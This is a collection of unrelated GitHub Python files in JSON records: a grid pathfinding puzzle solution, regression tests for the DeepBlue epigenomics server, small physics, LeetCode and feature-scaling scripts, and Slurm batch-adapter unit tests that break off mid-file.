connectionSocket.close()\r\n","repo_name":"taruntmk2712/CN","sub_path":"Socket/Lab/TCP/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33460424266","text":"import numpy as np\nimport bisect\n\nwith open('15.in') as infile:\n input = infile.read()\n\nlines = input.splitlines()\n\nmatrix = []\n\nfor line in lines:\n matrix.append(list(map(int, list(line))))\n\nmatrix = np.array(matrix)\n\n\ndef navigate(matrix):\n queue = [[0, 0, 0]]\n\n distance = np.copy(matrix)\n distance.fill(np.sum(matrix))\n distance[0, 0] = 0\n\n added = np.zeros(np.shape(matrix))\n added[0, 0] = 1\n\n dirs = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n\n while len(queue) > 0:\n [value, x, y] = queue.pop(0)\n\n for dir in dirs:\n nx = x + dir[0]\n ny = y + dir[1]\n\n if nx >= 0 and nx < len(matrix) and ny >= 0 and ny < len(matrix[0]):\n distance[nx, ny] = min(\n distance[nx, ny], value + matrix[nx, ny])\n if added[nx, ny] == 0:\n bisect.insort(queue, [distance[nx, ny], nx, ny])\n added[nx, ny] = 1\n\n return distance\n\n\ndef expand_matrix(matrix):\n xlen = len(matrix)\n ylen = len(matrix[0])\n new_matrix = np.zeros(shape=(xlen * 5, ylen * 5), dtype=int)\n\n for i in range(5):\n for j in range(5):\n new_matrix[xlen * i: xlen *\n (i + 1), ylen * j: ylen * (j + 1)] = (matrix + i + j + 8) % 9 + 1\n\n return new_matrix\n\n\n# distance = navigate(matrix)\n# print(distance)\n\n\nnew_matrix = expand_matrix(matrix)\ndistance = navigate(new_matrix)\nprint(distance[-1, -1])\n","repo_name":"vhurryharry/AoC","sub_path":"2021/15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25516873092","text":"import helpers\n\nfrom deepblue_client import DeepBlueClient\n\n\nclass TestBugs(helpers.TestCase):\n\n # Bug: Error when insert repeat_masker annotation - 67203100\n def test_no_start_position(self):\n file_content = \"\"\"1036\\t1146\\t43\\t0\\t18\\tchr19\\t59118819\\t1000\\t-10000\\t+\\t(TTAGGG)n\\tSimple_repeat\\tSimple_repeat\\t5\\t165\\t0\\t1\\n585\\t1080\\t161\\t1\\t0\\tchr19_gl000208_random\\t0\\t719\\t-91970\\t-\\tALR/Alpha\\tSatellite\\tcentr\\t-41\\t719\\t1\\t4\"\"\"\n\n rmsk = [\n \"BIN\",\n \"swSCORE\",\n \"MILLI_DIV\",\n \"MILLI_DEL\",\n \"MILLI_INS\",\n \"NAME\",\n \"START\",\n \"END\",\n \"GENO_LEFT\",\n \"STRAND\",\n \"repNAME\",\n \"REP_CLASS\",\n \"REP_FAMILY\",\n \"REP_START\",\n \"REP_END\",\n \"REP_LEFT\",\n \"ID\"\n]\n format = \",\".join(rmsk)\n\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n (r, a) = epidb.add_annotation(\"repeat_masker\", \"hg19\", None, file_content, format, None, self.admin_key)\n\n self.assertFailure(r, a)\n\n self.assertEquals(a, \"120002:The CHROMOSOME is missing in the format. Please, inform the CHROMOSOME column in the Format.\")\n\n rmsk2 = [\n \"BIN\",\n \"swSCORE\",\n \"MILLI_DIV\",\n \"MILLI_DEL\",\n \"MILLI_INS\",\n \"CHROMOSOME\",\n \"START\",\n \"END\",\n \"GENO_LEFT\",\n \"STRAND\",\n \"repNAME\",\n \"REP_CLASS\",\n \"REP_FAMILY\",\n \"REP_START\",\n \"REP_END\",\n \"REP_LEFT\",\n \"ID\"\n]\n format2 = \",\".join(rmsk2)\n\n (r, a) = epidb.add_annotation(\"repeat_masker2\", \"hg19\", None, file_content, format2, None, self.admin_key)\n\n self.assertSuccess(r, a)\n\n def test_invalid_eamp_character(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n epidb.add_biosource(\"rostrolateral thalamic nucleus of Butler Saidel\", \"\", {}, self.admin_key)\n epidb.add_biosource(\"testing cool\", \"\", {}, self.admin_key)\n epidb.add_biosource(\"testing ugly &Saidel\", \"\", {}, self.admin_key)\n epidb.add_biosource(\"testing weird \", \"\", {}, self.admin_key)\n epidb.add_biosource(\"testing closed \", \"\", {}, self.admin_key)\n epidb.add_biosource(\"!'234456789<<<<><<<;;.,.,-,>\", \"\", {}, self.admin_key)\n\n (r,a) = epidb.list_biosources(None, self.admin_key)\n self.assertSuccess(r,a)\n\n biosource_names = [x[1] for x in a]\n self.assertEquals(biosource_names, ['K562', 'Brain', 'rostrolateral thalamic nucleus of Butler Saidel', 'testing cool', 'testing ugly &Saidel', 'testing weird ', 'testing closed ', \"!'234456789<<<<><<<;;.,.,-,>\"])\n\n def test_wrong_chromosomes_usage(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n cpg_island = \",\".join([\n \"CHROMOSOME\",\n \"START\",\n \"END\",\n \"NAME\",\n \"LENGTH\",\n \"NUM_CPG\",\n \"NUM_GC\",\n \"PER_CPG\",\n \"PER_CG\",\n \"OBS_EXP\"\n ])\n\n file_data = None\n with open(\"data/cpgIslandExtFull.txt\", 'r') as f:\n file_data = f.read()\n\n res = epidb.add_annotation(\"Cpg Islands\", \"hg19\", \"Complete CpG islands\", file_data, cpg_island, None, self.admin_key)\n self.assertSuccess(res)\n\n size_total = len(file_data.split(\"\\n\"))\n\n (status, qid_cpg) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chr1\", None, None, self.admin_key)\n\n (s, req) = epidb.count_regions(qid_cpg, self.admin_key)\n self.assertSuccess(s, req)\n c = self.count_request(req)\n\n self.assertEquals(2462, c)\n\n total = 0\n (status, cq1) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chr1\", None, None, self.admin_key)\n (s, req1) = epidb.count_regions(cq1, self.admin_key)\n c1 = self.count_request(req1)\n\n (status, cq2) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chr7\", None, None, self.admin_key)\n (s, req2) = epidb.count_regions(cq2, self.admin_key)\n c2 = self.count_request(req2)\n\n (status, cq3) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chr18\", None, None, self.admin_key)\n (s, req3) = epidb.count_regions(cq3, self.admin_key)\n c3 = self.count_request(req3)\n\n (status, cq4) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chrX\", None, None, self.admin_key)\n (s, req4) = epidb.count_regions(cq4, self.admin_key)\n c4 = self.count_request(req4)\n\n total = int(c1) + int(c2) + int(c3) + int(c4)\n\n (status, qid_count) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", [\"chr1\",\"chr7\",\"chr18\",\"chrX\"], None, None, self.admin_key)\n (s, req) = epidb.count_regions(qid_count, self.admin_key)\n c = self.count_request(req)\n self.assertEquals(c, total)\n\n cpg_island_chrs = \"\"\"chr1\nchr10\nchr11\nchr11_gl000202_random\nchr12\nchr13\nchr14\nchr15\nchr16\nchr17\nchr17_ctg5_hap1\nchr17_gl000204_random\nchr17_gl000205_random\nchr18\nchr19\nchr1_gl000191_random\nchr1_gl000192_random\nchr2\nchr20\nchr21\nchr22\nchr3\nchr4\nchr4_ctg9_hap1\nchr4_gl000193_random\nchr4_gl000194_random\nchr5\nchr6\nchr6_apd_hap1\nchr6_cox_hap2\nchr6_dbb_hap3\nchr6_mann_hap4\nchr6_mcf_hap5\nchr6_qbl_hap6\nchr6_ssto_hap7\nchr7\nchr8\nchr8_gl000197_random\nchr9\nchr9_gl000199_random\nchr9_gl000200_random\nchr9_gl000201_random\nchrUn_gl000211\nchrUn_gl000212\nchrUn_gl000213\nchrUn_gl000214\nchrUn_gl000215\nchrUn_gl000216\nchrUn_gl000217\nchrUn_gl000218\nchrUn_gl000219\nchrUn_gl000220\nchrUn_gl000221\nchrUn_gl000222\nchrUn_gl000223\nchrUn_gl000224\nchrUn_gl000225\nchrUn_gl000228\nchrUn_gl000229\nchrUn_gl000231\nchrUn_gl000235\nchrUn_gl000236\nchrUn_gl000237\nchrUn_gl000240\nchrUn_gl000241\nchrUn_gl000242\nchrUn_gl000243\nchrX\nchrY\"\"\"\n\n (status, qid_count) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", cpg_island_chrs.split(\"\\n\"), None, None, self.admin_key)\n (s, req) = epidb.count_regions(qid_count, self.admin_key)\n c = self.count_request(req)\n self.assertEquals(size_total, c)\n\n def test_not_find_genome_and_in_order_chromosoms(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n genome_data = \"\"\"chr1 1000000\nchr2 900000\nchr3 500000\nchrX 100000\"\"\"\n epidb.add_genome(\"Genome Example\", \"Example of Genome for the Manual\", genome_data, self.admin_key)\n\n x = epidb.chromosomes(\"Genome Example\", self.admin_key)\n self.assertEquals(x, ['okay', [['chr1', 1000000], ['chr2', 900000], ['chr3', 500000], ['chrX', 100000]]])\n\n def test_sample_search_from_synonym(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n s = epidb.add_biosource(\"Bio Source A\", \"\", {}, self.admin_key)\n self.assertSuccess(s)\n\n s = epidb.set_biosource_synonym(\"Bio Source A\", \"BSA\", self.admin_key)\n self.assertSuccess(s)\n\n s = epidb.add_sample(\"BSA\", {}, self.admin_key)\n self.assertSuccess(s)\n\n s = epidb.list_samples(\"Bio Source A\", {}, self.admin_key)\n self.assertSuccess(s)\n\n list_bio_source_a = s[1]\n self.assertTrue(len(list_bio_source_a) > 0)\n\n s = epidb.list_samples(\"BSA\", {}, self.admin_key)\n self.assertSuccess(s)\n\n list_bsa = s[1]\n self.assertTrue(len(list_bsa) > 0)\n\n self.assertEqual(list_bio_source_a, list_bsa)\n\n\n # Bug that does not allow to set the true hierarchy\n # A is parent of B, that is parent of C that is parent of D\n # A is also parent of D\n def test_biosource_true_hierarchy(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init(epidb)\n\n self.assertSuccess(epidb.add_biosource(\"AAA\", None, {}, self.admin_key))\n self.assertSuccess(epidb.add_biosource(\"BBB\", None, {}, self.admin_key))\n self.assertSuccess(epidb.add_biosource(\"CCC\", None, {}, self.admin_key))\n self.assertSuccess(epidb.add_biosource(\"DDD\", None, {}, self.admin_key))\n\n res = epidb.set_biosource_parent(\"AAA\", \"BBB\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"BBB\", \"CCC\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"CCC\", \"DDD\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"AAA\", \"DDD\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"DDD\", \"BBB\", self.admin_key)\n self.assertFailure(res)\n self.assertSuccess(epidb.add_biosource(\"EEE\", None, {}, self.admin_key))\n res = epidb.set_biosource_parent(\"DDD\", \"EEE\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"AAA\", \"EEE\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"EEE\", \"BBB\", self.admin_key)\n self.assertFailure(res)\n res = epidb.set_biosource_parent(\"EEE\", \"CCC\", self.admin_key)\n self.assertFailure(res)\n res = epidb.set_biosource_synonym(\"AAA\", \"macaco\", self.admin_key)\n self.assertSuccess(res)\n\n expected = [['bs1', 'AAA', 'biosources'], ['bs2', 'BBB', 'biosources'], ['bs3', 'CCC', 'biosources'], ['bs4', 'DDD', 'biosources'], ['bs5', 'EEE', 'biosources']]\n (res, s) = epidb.search(\"macaco\", None, self.admin_key)\n self.assertSuccess(res, s)\n self.assertEquals(s, expected)\n\n (res, s) = epidb.search(\"AAA\", None, self.admin_key)\n self.assertSuccess(res, s)\n self.assertEquals(s, expected)\n\n def test_biosource_true_hierarchy(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n sample_id = self.sample_ids[0]\n\n data = \"chr1\\t100\\t110\\t1\\nchr1\\t200\\t400\\t0\\nchr1\\t400\\t500\\t1\\nchr1\\t200\\t400\\t0\\n\"\n format = \"CHROMOSOME,START,END,SCORE\"\n\n (res, a_1) = epidb.add_experiment(\"test\", \"hg19\", \"H3K4me3\", sample_id, \"tech1\", \"ENCODE\", \"wgEncodeBroadHistoneH1hescH3k27me3StdPk.bed from ENCODE\", data, format, None, self.admin_key)\n\n self.assertSuccess(res, a_1)\n\n (s, q) = epidb.select_regions(\"test\", \"hg19\", None, None, None, None, \"chr1\", None, None, self.admin_key)\n\n (s, tl) = epidb.tiling_regions(150000000, \"hg19\", \"chr1\", self.admin_key)\n\n res, qid_4 = epidb.aggregate(q, tl, \"SCORE\", self.admin_key)\n s, req = epidb.get_regions(qid_4, \"CHROMOSOME,START,END,@AGG.MIN,@AGG.MAX,@AGG.MEAN,@AGG.COUNT\", self.admin_key)\n self.assertSuccess(s, req)\n\n rs = self.get_regions_request(req)\n\n self.assertEquals(rs, \"chr1\\t0\\t150000000\\t0.0000\\t1.0000\\t0.5000\\t4\")\n\n def test_empty_result(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init(epidb)\n\n s, g1 = epidb.add_genome(\"hg19\", \"\", \"chr1 10000\\nchr2 30000\", self.admin_key)\n self.assertSuccess(s, g1)\n s, t1 = epidb.add_technique(\"chip-seq\", \"\", None, self.admin_key)\n self.assertSuccess(s, t1)\n\n (s, q) = epidb.select_regions(None, \"hg19\", None, None, \"chip-seq\", None, None, 1000, 2000, self.admin_key)\n self.assertSuccess(s, q)\n (s, req) = epidb.get_regions(q, \"CHROMOSOME,START,END\", self.admin_key)\n self.assertSuccess(s, q)\n rs = self.get_regions_request(req)\n self.assertEquals(rs, \"\")\n\n\n def test_empty_no_permission_column_type(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n res, cid = epidb.create_column_type_category(\"PLUS_MINUS_DOT\", \"Region strand: +, -, .\", [\"+\", \"-\", \".\"], self.admin_key)\n\n s, (u_id, u_key) = epidb.add_user(\"user\", \"email\", \"institution\", self.admin_key)\n self.assertSuccess(s)\n\n s = epidb.modify_user_admin(u_id, \"permission_level\", \"NONE\", self.admin_key)\n self.assertSuccess(s)\n\n info = epidb.info(cid, u_key)\n self.assertEqual(info, ['error', '100100:Insufficient permission. Permission LIST_COLLECTIONS is required.'])\n info_e1 = epidb.info(\"e1\", u_key)\n self.assertEqual(info_e1, ['error', '100100:Insufficient permission. Permission LIST_COLLECTIONS is required.'])\n info_e2 = epidb.info(\"me\", u_key)\n self.assertEqual(info_e2, ['okay', [{'name': 'user', 'institution': 'institution', 'id': 'u3', 'permission_level': 'NONE', 'type': 'user', 'email': 'email'}]])\n\n\n def test_include_invalid_regions(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n data = \"\"\"chr1\\t1\\t100000000000000000\nchr10\\t666\\t66610000\nchrY\\t12345\\t1234567\"\"\"\n (s, a) = epidb.add_annotation(\"test annotation\", \"hg19\", \"testing\", data, \"CHROMOSOME,START,END\", {\"HI\": \"HOW ARE YOU?\"}, self.admin_key)\n self.assertFailure(s, a)\n self.assertEquals(a, \"Error while reading the BED file. Line: 0. - '100000000000000000 is not a valid end position'\")\n\n data = \"\"\"chr1\\t2147483647\\t2147483648\"\"\"\n (s, a) = epidb.add_annotation(\"test annotation\", \"hg19\", \"testing\", data, \"CHROMOSOME,START,END\", {\"HI\": \"HOW ARE YOU?\"}, self.admin_key)\n self.assertFailure(s, a)\n self.assertEquals(a, \"Invalid region: 2147483647 - 2147483648. It is beyond the length of the chromosome chr1 .\")\n\n #info() on user queries #91\n def test_info_on_user_queries(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n res, user_one = epidb.add_user(\"user1\", \"test1@example.com\", \"test\", self.admin_key)\n self.assertSuccess(res, user_one)\n s, tmp_user = epidb.modify_user_admin(user_one[0], \"permission_level\", \"GET_DATA\", self.admin_key)\n self.assertSuccess(s)\n\n res, user_two = epidb.add_user(\"user2\", \"test2@example.com\", \"test\", self.admin_key)\n self.assertSuccess(res, user_two)\n s, tmp_user = epidb.modify_user_admin(user_two[0], \"permission_level\", \"GET_DATA\", self.admin_key)\n self.assertSuccess(s)\n\n (s, t1) = epidb.tiling_regions(100, \"hg19\", \"chr1\", user_one[1])\n s = epidb.info(t1, user_one[1])\n self.assertEquals(s, ['okay', [{'_id': 'q1', 'type': 'tiling', 'user': 'user1', 'args': {\"genome\" : \"hg19\", \"size\" : 100, \"chromosomes\" : [ \"chr1\" ] }}]])\n s = epidb.info(t1, user_two[1])\n self.assertEquals(s, ['error', \"111003:You are not the query ID 'q1' owner and neither an administrator.\"])\n s = epidb.info(t1, self.admin_key)\n self.assertEquals(s, ['okay', [{'_id': 'q1', 'type': 'tiling', 'user': 'user1', 'args': { \"genome\" : \"hg19\", \"size\" : 100, \"chromosomes\" : [ \"chr1\" ] }}]])\n\n\n def test_bug_do_not_reuse_existing_query(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n sample_id = self.sample_ids[0]\n\n data = \"chr1\\t100\\t110\\t1\\nchr1\\t200\\t400\\t0\\nchr1\\t400\\t500\\t1\\nchr1\\t200\\t400\\t0\\n\"\n format = \"CHROMOSOME,START,END,SCORE\"\n\n (res, a_1) = epidb.add_experiment(\"test\", \"hg19\", \"H3K4me3\", sample_id, \"tech1\", \"ENCODE\", \"wgEncodeBroadHistoneH1hescH3k27me3StdPk.bed from ENCODE\", data, format, None, self.admin_key)\n self.assertSuccess(res, a_1)\n\n (s, q0) = epidb.select_regions(\"test\", \"hg19\", None, None, None, None, \"chr1\", None, None, self.admin_key)\n (s, q1) = epidb.query_experiment_type(q0, \"peaks\", self.admin_key)\n\n (s, q00) = epidb.select_regions(\"test\", \"hg19\", None, None, None, None, \"chr1\", None, None, self.admin_key)\n (s, q11) = epidb.query_experiment_type(q0, \"peaks\", self.admin_key)\n\n self.assertEqual(q0, q00)\n self.assertEqual(q1, q11)\n\n\n","repo_name":"MPIIComputationalEpigenetics/DeepBlue","sub_path":"server/tests/test_cases/bugs.py","file_name":"bugs.py","file_ext":"py","file_size_in_byte":14785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"36868788847","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nxi = 0\nv0 = 100\nyi = 0\ng = 9.81\nclass Projectile:\n def __init__(s,theta):\n s.theta = theta\n s.T = 2 * v0 * np.sin(np.radians(s.theta)) / g\n s.t = np.arange(0,s.T,0.1)\n s.x = xi + (v0 * np.cos(np.radians(s.theta)) * s.t)\n s.y = yi + (v0 * np.sin(np.radians(s.theta)) * s.t) - ((g * (s.t ** 2))/2)\n\nfor i in range(0,90):\n line = Projectile(i)\n plt.plot(line.x, line.y, label = line.theta)\n\nplt.margins(0.01)\nplt.legend()\nplt.show()\n","repo_name":"seekermind/codes","sub_path":"computationalPhysicsProject/projectile1/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6084517612","text":"'''\nAuthor: liubei\nDate: 2021-07-06 10:34:26\nLastEditTime: 2021-07-06 10:58:33\nDescription: \n'''\n#\n# @lc app=leetcode.cn id=17 lang=python3\n#\n# [17] 电话号码的字母组合\n#\n# https://leetcode-cn.com/problems/letter-combinations-of-a-phone-number/description/\n#\n# algorithms\n# Medium (56.90%)\n# Likes: 1383\n# Dislikes: 0\n# Total Accepted: 291.9K\n# Total Submissions: 512.9K\n# Testcase Example: '\"23\"'\n#\n# 给定一个仅包含数字 2-9 的字符串,返回所有它能表示的字母组合。答案可以按 任意顺序 返回。\n# \n# 给出数字到字母的映射如下(与电话按键相同)。注意 1 不对应任何字母。\n# \n# \n# \n# \n# \n# 示例 1:\n# \n# \n# 输入:digits = \"23\"\n# 输出:[\"ad\",\"ae\",\"af\",\"bd\",\"be\",\"bf\",\"cd\",\"ce\",\"cf\"]\n# \n# \n# 示例 2:\n# \n# \n# 输入:digits = \"\"\n# 输出:[]\n# \n# \n# 示例 3:\n# \n# \n# 输入:digits = \"2\"\n# 输出:[\"a\",\"b\",\"c\"]\n# \n# \n# \n# \n# 提示:\n# \n# \n# 0 \n# digits[i] 是范围 ['2', '9'] 的一个数字。\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n def dfs(self, digits, idx, dm, combins, ans):\n if idx >= len(digits):\n return\n\n chars = dm[int(digits[idx])]\n\n for c in chars:\n newcombins = combins + c\n\n if idx == len(digits) - 1:\n ans.append(newcombins)\n\n self.dfs(digits, idx + 1, dm, newcombins, ans)\n\n def letterCombinations(self, digits):\n dm = [[], [], ['a', 'b', 'c'], ['d', 'e', 'f'], ['g', 'h', 'i'], ['j', 'k', 'l'], ['m', 'n', 'o'], ['p', 'q', 'r', 's'], ['t', 'u', 'v'], ['w', 'x', 'y', 'z']]\n ans = []\n\n self.dfs(digits, 0, dm, '', ans)\n\n return ans\n# @lc code=end\n\ns = Solution()\ns.letterCombinations('23')\n","repo_name":"liubei90/leetcode","sub_path":"17.电话号码的字母组合.py","file_name":"17.电话号码的字母组合.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12918567523","text":"from matplotlib import pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\n\ndf = sns.load_dataset('titanic')\n# print(df.head())\n\ndf2 = df[['survived','pclass','age','parch']]\n# print(df2)\n\n# print(df2.mean())\n# sns.heatmap(df2.isnull(),cmap='viridis',yticklabels=False)\ndf3 = df2.fillna(df2.mean())\n# print(df3)\n# sns.heatmap(df3.isnull(),cmap='viridis', yticklabels=False)\n\nX = df3.drop('survived', axis=1)\n# print(X)\n\ny = df3['survived']\n# print(y)\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=101)\n\n\n# Standard Scalar => mean=0, variance=1\nsc = StandardScaler()\nsc.fit(X_train)\n\n#mean\n# print(f'mean : {sc.mean_}')\n#standard deviation\n# print(f'standard deviation : {sc.scale_}')\n# print(X_train.describe())\n\nX_train_sc = sc.transform(X_train)\nX_test_sc = sc.transform(X_test)\n\n# print(X_train_sc)\n\nX_train_sc = pd.DataFrame(X_train_sc, columns=['pclass','age','parch'])\n# print(X_train_sc)\nX_test_sc = pd.DataFrame(X_test_sc, columns=['pclass','age','parch'])\n# print(X_test_sc)\n# print(X_train_sc.describe().round(2))\n\n# MinMaxScaler => min=0, max=1\nmms = MinMaxScaler()\nmms.fit(X_train)\nX_train_mms = mms.transform(X_train)\n# print(X_train_mms)\nX_test_mms = mms.transform(X_test)\n\nX_train_mms = pd.DataFrame(X_train_mms, columns=['pclass','age','parch'])\n# print(X_train_mms)\nX_test_mms = pd.DataFrame(X_test_mms, columns=['pclass','age','parch'])\n# print(X_test_mms)\n# print(X_train_mms.describe().round(2))\n\n\n#before and after scaling the feature data wont get changes in the ditribution\nsns.pairplot(X_train)\nsns.pairplot(X_train_sc)\nsns.pairplot(X_train_mms)\nplt.show()\n\n","repo_name":"MohammedShakeeb112/ml_Algo","sub_path":"featureScaling.py","file_name":"featureScaling.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8981870886","text":"from tests.utilities.utilities import async_return\nfrom tests.utilities.utilities import run_async\nfrom tardis.adapters.batchsystems.slurm import SlurmAdapter\nfrom tardis.utilities.attributedict import AttributeDict\n\nfrom tardis.adapters.batchsystems.slurm import slurm_status_updater\nfrom tardis.interfaces.batchsystemadapter import MachineStatus\n\nfrom tardis.exceptions.executorexceptions import CommandExecutionFailure\n\nfrom functools import partial\nfrom unittest.mock import MagicMock, patch\nfrom unittest import TestCase\n\n\nclass TestSlurmAdapter(TestCase):\n mock_config_patcher = None\n mock_async_run_command_patcher = None\n\n @classmethod\n def setUpClass(cls):\n cls.mock_config_patcher = patch(\n \"tardis.adapters.batchsystems.slurm.Configuration\"\n )\n cls.mock_async_run_command_patcher = patch(\n \"tardis.adapters.batchsystems.slurm.async_run_command\", new=MagicMock()\n )\n cls.mock_config = cls.mock_config_patcher.start()\n cls.mock_async_run_command = cls.mock_async_run_command_patcher.start()\n\n @classmethod\n def tearDownClass(cls):\n cls.mock_config_patcher.stop()\n cls.mock_async_run_command_patcher.stop()\n\n def setUp(self):\n self.cpu_ratio = 0.5\n self.memory_ratio = 0.25\n\n self.command = 'sinfo --Format=\"statelong,cpusstate,allocmem,memory,features,nodehost\" -e --noheader -r --partition=test_part' # noqa B950\n\n self.command_wo_options = 'sinfo --Format=\"statelong,cpusstate,allocmem,memory,features,nodehost\" -e --noheader -r' # noqa B950\n\n return_value = \"\\n\".join(\n [\n \"mixed 2/2/0/4 6000 24000 VM-1 host-10-18-1-1\",\n \"mixed 3/1/0/4 15853 22011 VM-2 host-10-18-1-2\",\n \"mixed 1/3/0/4 18268 22011 VM-3 host-10-18-1-4\",\n \"mixed 3/1/0/4 17803 22011 VM-4 host-10-18-1-7\",\n \"draining 0/4/0/4 17803 22011 draining_m draining_m\",\n \"idle 0/4/0/4 17803 22011 idle_m idle_m\",\n \"drained 0/4/0/4 17803 22011 drained_m drained_m\",\n \"powerup 0/4/0/4 17803 22011 pwr_up_m pwr_up_m\",\n ]\n )\n\n self.mock_async_run_command.return_value = async_return(\n return_value=return_value\n )\n\n self.setup_config_mock(\n options=AttributeDict({\"long\": {\"partition\": \"test_part\"}})\n )\n\n self.slurm_adapter = SlurmAdapter()\n\n def tearDown(self):\n self.mock_async_run_command.reset_mock()\n\n def setup_config_mock(self, options=None):\n self.config = self.mock_config.return_value\n self.config.BatchSystem.max_age = 10\n if options:\n self.config.BatchSystem.options = options\n else:\n self.config.BatchSystem.options = {}\n\n def test_disintegrate_machine(self):\n self.assertIsNone(\n run_async(self.slurm_adapter.disintegrate_machine, drone_uuid=\"test\")\n )\n\n def test_drain_machine(self):\n run_async(self.slurm_adapter.drain_machine, drone_uuid=\"VM-1\")\n self.mock_async_run_command.assert_called_with(\n \"scontrol update NodeName=host-10-18-1-1 State=DRAIN Reason='COBalD/TARDIS'\"\n )\n\n self.mock_async_run_command.reset_mock()\n\n self.assertIsNone(\n run_async(self.slurm_adapter.drain_machine, drone_uuid=\"not_exists\")\n )\n self.mock_async_run_command.side_effect = CommandExecutionFailure(\n message=\"Does not exists\", exit_code=1, stderr=\"Does not exists\"\n )\n with self.assertRaises(CommandExecutionFailure):\n self.assertIsNone(\n run_async(self.slurm_adapter.drain_machine, drone_uuid=\"idle_m\")\n )\n\n self.mock_async_run_command.side_effect = None\n\n def test_drain_machine_without_options(self):\n self.setup_config_mock()\n self.slurm_adapter = SlurmAdapter()\n\n run_async(self.slurm_adapter.drain_machine, drone_uuid=\"VM-1\")\n self.mock_async_run_command.assert_called_with(\n \"scontrol update NodeName=host-10-18-1-1 State=DRAIN Reason='COBalD/TARDIS'\"\n )\n\n def test_integrate_machine(self):\n self.assertIsNone(\n run_async(self.slurm_adapter.integrate_machine, drone_uuid=\"VM-1\")\n )\n\n def test_get_resource_ratios(self):\n self.assertEqual(\n list(run_async(self.slurm_adapter.get_resource_ratios, drone_uuid=\"VM-1\")),\n [self.cpu_ratio, self.memory_ratio],\n )\n self.mock_async_run_command.assert_called_with(self.command)\n\n self.assertEqual(\n run_async(self.slurm_adapter.get_resource_ratios, drone_uuid=\"not_exists\"),\n {},\n )\n\n def test_get_resource_ratios_without_options(self):\n self.setup_config_mock()\n del self.config.BatchSystem.options\n self.slurm_adapter = SlurmAdapter()\n\n self.assertEqual(\n list(run_async(self.slurm_adapter.get_resource_ratios, drone_uuid=\"VM-1\")),\n [self.cpu_ratio, self.memory_ratio],\n )\n\n self.mock_async_run_command.assert_called_with(self.command_wo_options)\n\n def test_get_allocation(self):\n self.assertEqual(\n run_async(self.slurm_adapter.get_allocation, drone_uuid=\"VM-1\"),\n max([self.cpu_ratio, self.memory_ratio]),\n )\n self.mock_async_run_command.assert_called_with(self.command)\n\n self.assertEqual(\n run_async(self.slurm_adapter.get_allocation, drone_uuid=\"not_exists\"),\n 0.0,\n )\n\n def test_get_machine_status(self):\n state_mapping = {\n \"VM-1\": MachineStatus.Available,\n \"not_exists\": MachineStatus.NotAvailable,\n \"draining_m\": MachineStatus.Draining,\n \"idle_m\": MachineStatus.Available,\n \"drained_m\": MachineStatus.NotAvailable,\n \"pwr_up_m\": MachineStatus.NotAvailable,\n }\n\n for machine, state in state_mapping.items():\n self.assertEqual(\n run_async(self.slurm_adapter.get_machine_status, drone_uuid=machine),\n state,\n )\n\n self.mock_async_run_command.reset_mock()\n\n self.mock_async_run_command.side_effect = CommandExecutionFailure(\n message=\"Test\", exit_code=123, stderr=\"Test\"\n )\n with self.assertLogs(level=\"WARN\"):\n with self.assertRaises(CommandExecutionFailure):\n attributes = {\n \"Machine\": \"Machine\",\n \"State\": \"State\",\n \"Activity\": \"Activity\",\n \"TardisDroneUuid\": \"TardisDroneUuid\",\n }\n run_async(\n partial(\n slurm_status_updater,\n self.config.BatchSystem.options,\n attributes,\n )\n )\n self.mock_async_run_command.assert_called_with(self.command)\n\n self.mock_async_run_command.side_effect = None\n\n def test_get_utilisation(self):\n 